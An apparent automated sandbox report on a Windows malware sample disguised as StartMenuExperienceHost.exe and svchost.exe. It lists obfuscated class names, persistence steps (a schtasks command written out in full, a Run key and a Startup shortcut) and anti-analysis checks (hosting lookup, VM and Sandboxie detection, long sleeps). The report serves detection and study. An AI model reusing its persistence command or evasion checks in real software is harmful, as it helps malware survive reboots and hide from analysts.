Source: StartMenuExperienceHost.exe.4.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.cs | High entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | High entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.cs | High entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs | High entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | High entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'
Source: svchost.exe.12.dr, YuWwnU774i1WXQz.cs | High entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
Source: svchost.exe.12.dr, BYZXqCcInfvLxkJ.cs | High entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
Source: svchost.exe.12.dr, vxw6fPaLgCWKUy0.cs | High entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
Source: svchost.exe.12.dr, 4YsgSk8wbMoiiRy.cs | High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
Source: svchost.exe.12.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.cs | High entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
Source: svchost.exe.12.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.cs | High entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
Source: svchost.exe.12.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.cs | High entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs | High entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.cs | High entropy of concatenated method names: 'Oo2VpJ8DA9dfSFJ', 'TdMOqWUpSawR8y67wO4vBTN7LteXwycr', 'qcowZOmbo9NRKRXvG7K0zCJX9Q8i4A5x', 'RE5foa9s72iXmDoDRb1bl6pa7n5TBJIF', 'mGiE2pwrLOyOjbM6DrU658lmrGzuSbMm'
Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs | High entropy of concatenated method names: 'baNNnFSKLXWA2Vp', 'TmugH64xJCiIMPp', 'KZTeDrkeZn9BeSf', 'vI6F9EiF4ibw3FL', 'uTHL0d6K4N56D43', '_92fzp0lF8SeY0E2', '_7RfOR0iXoxN4vU0', 'VFBbV1GiS4LQYTR', 'B9j38p5xby1352z', 'cQhKayGAR9Fenqg'
Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | High entropy of concatenated method names: 'kgZC0xlCkJHHvkk7kg8bpMGjU3Pib4N60QrK0gdb', '_6OORxCIRtmjnnts0LQZCrfz6gCGkOEFWGy2YGy29', '_8qL3IO7vaZbJ9xmA4UmVVNVxn0vbUiEXJkpv53JX', 'M9hJnsyccWtdo6Vy1EEAHfojlM2H0Yj3L1M9lIaS', 'Ks8Hu8iWSZ2Q1AtCF15qJz5FzJ0hN0HuhnDHgYCh', 'kiczvmGtaXkejXlQnRNyqUZhu1JTZXDnPndslR35', 'JpSkYAfaZhVhp6yTUEUEFdTOaSwALU95Jox0fSyi', 'w0JnMFB1e7LCKlTka0EshC4imbiB3iaHKIp8oSde', 'kgONNwqduucn7ErvHGUsGLHTXff3wXZ0f0PaHxQi', 'eL0TZe4MYmBtdnGq5xTBAu9HxwDnN33uFE4oS2IW'

                            Persistence and Installation Behavior

Source: C:\Windows\StartMenuExperienceHost.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\StartMenuExperienceHost.exe
Source: C:\Windows\System32\curl.exe | File created: C:\Windows\StartMenuExperienceHost.exe

                            Boot Survival

Source: C:\Windows\StartMenuExperienceHost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\StartMenuExperienceHost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Windows\StartMenuExperienceHost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\StartMenuExperienceHost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: C:\Windows\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr Binary or memory string: SBIEDLL.DLL
                            Source: C:\Windows\StartMenuExperienceHost.exe Memory allocated: 1270000 memory reserve | memory write watch
                            Source: C:\Windows\StartMenuExperienceHost.exe Memory allocated: 1AE20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 3140000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1B140000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1550000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: F80000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: BB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 3200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1B200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: FF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1AFA0000 memory reserve | memory write watch
                            Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 600000
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 599563
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 599256
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 599115
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 599000
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598889
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598781
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598671
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598555
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598451
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598343
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598232
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598124
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 598016
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597906
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597797
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597687
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597578
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597465
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597359
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597244
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597137
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 597030
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 596917
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 596783
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 596298
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 596121
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 596014
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595906
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595797
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595687
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595577
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595466
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595356
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595248
                            Source: C:\Windows\StartMenuExperienceHost.exe Thread delayed: delay time: 595139
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe Window / User API: threadDelayed 9998
                            Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 9392
                            Source: C:\Windows\StartMenuExperienceHost.exe Window / User API: threadDelayed 3568
                            Source: C:\Windows\StartMenuExperienceHost.exe Window / User API: threadDelayed 6256
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe API coverage: 9.1 %
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -38738162554790034s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -600000s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -599563s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -599256s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -599115s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -599000s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598889s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598781s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598671s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598555s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598451s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598343s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598232s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598124s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -598016s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597906s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597797s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597687s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597578s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597465s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597359s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597244s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597137s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -597030s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -596917s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -596783s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -596298s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -596121s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -596014s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595906s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595797s >= -30000s
